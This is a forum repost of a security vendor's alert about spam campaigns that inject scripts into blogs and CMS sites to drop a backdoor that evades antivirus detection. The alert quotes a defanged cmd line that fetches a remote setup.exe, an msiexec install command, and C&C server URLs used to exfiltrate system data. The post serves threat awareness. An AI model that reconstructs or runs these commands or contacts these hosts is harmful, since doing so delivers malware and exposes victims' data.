Thread Rating:
  • 1 Vote(s) - 5 Average
  • 1
  • 2
  • 3
  • 4
  • 5
Security Alert: Malware is Hiding in Script Injection and Bypasses AV Detection
#1
Exclamation 
[Image: 3VM2SmP.jpg]

Quote:[Image: Security-Alert-about-script-injections-attack-1.png]

We all know that cybercriminals never cease to look out for creative methods to launch (more) targeted attacks with a smaller infrastructure to carry out, giving them easy access to users’ most valuable data.

Security researchers recently observed and analyzed various spam campaigns in which online criminals were trying to infect multiple commercial blogs and insecure Content Management Systems (CMS).

How the infection spreads (technical details explained)

In the analyzed spam campaigns, the attackers are baiting victims by trying to inject malicious scripts with the main purpose to run the following payload (sanitized for your own safety) on users’ machines:

Code:
cmd / c cd% Public% & @ echo AmmEiqWkls = “” https: //gullgas.weebly [.] com / uploads / 1/2/3/0/123060154 / setup.exe”

This particular “setup.exe” is a malicious file which is hidden in the Nullsoft Scriptable Install System (NSIS) package. This technique isn’t new, because we have seen it in previous spam campaigns, but it’s notable how malicious actors improve the way they “pack” malicious code to deliver malware.

If the executable file is dropped on the infected machines, cybercriminals can collect sensitive information, such as: IP address, MAC address, manufacturer details, country name, Name and ID of the Operation System, CPUID or Hard Disk serial number. These data are stored in a Javascript object which is converted into JSON and then added in text strings.

Once attackers can remotely access the victim’s’ Windows machine, they will install the malicious executable file as follows:

Code:
msiexec.exe in C: Documents and Settings [user account] Local Settings Application Data Downloaded Installations {374BE032-0D10-4FAE-9C8E-BAC1B936896F} Setup12.msi “SETUPEXEDIR =” C: “SETUPEXENAME

All the data is then protected using this “UnqiueKeyGenerate.Encrypt (name)” function.

In the next step, the backdoor is copied to C: ProgramData in Windows Update folder, and then tries to check for an Internet connection to connect to the following C&C servers (sanitized for your own protection): http: //18.218.2 [.] 135 / service1.svc / applyingpoliciesrules / http: //18.218.2 [.] 135 / service1.svc / getInfoAfterInstall

After that, all data is accessed through these C&C servers, and the communication process is encrypted with a special key.
The main target of this type of attack is to exfiltrate data from compromised systems and to open a backdoor which allows online criminals to feed more malware into the targeted machines.

Heimdal Security proactively blocked these infected domains, so all Thor Home and Thor Enterprise users are protected.
According to VirusTotal, NO antivirus product out of 68 products has managed to detect this .exe file as malicious at the time we write this security alert.
Full Reading
[-] The following 4 users say Thank You to harlan4096 for this post:
  • darktwilight, dhruv2193, jasonX, silversurfer
Reply


Forum Jump:


Users browsing this thread: 1 Guest(s)
[-]
Welcome
You have to register before you can post on our site.

Username/Email:


Password:





[-]
Recent Posts
AWZ Screen Recorder
AWZ Screen Recorder ...zevish — 11:05
Website X5 Go 2024.1
Website X5 Go 2024.1...zevish — 09:32
Apple's rules to allow third-party app ...
Apple has announ...alison30 — 09:28
Intel: Microsoft AI PCs need a Copilot K...
Microsoft hopes th...harlan4096 — 08:55
Synchredible 8 Professional Edition v8.2...
          Synchredib...zevish — 08:54

[-]
Birthdays
Today's Birthdays
No birthdays today.
Upcoming Birthdays
No upcoming birthdays.

[-]
Online Staff
There are no staff members currently online.

>